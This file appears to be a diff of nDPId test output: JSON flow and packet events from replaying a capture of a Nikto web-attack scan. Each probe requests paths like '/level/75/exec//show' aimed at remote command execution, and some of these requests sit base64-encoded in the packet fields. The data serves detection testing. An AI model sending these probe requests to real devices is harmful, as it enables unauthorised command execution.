-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
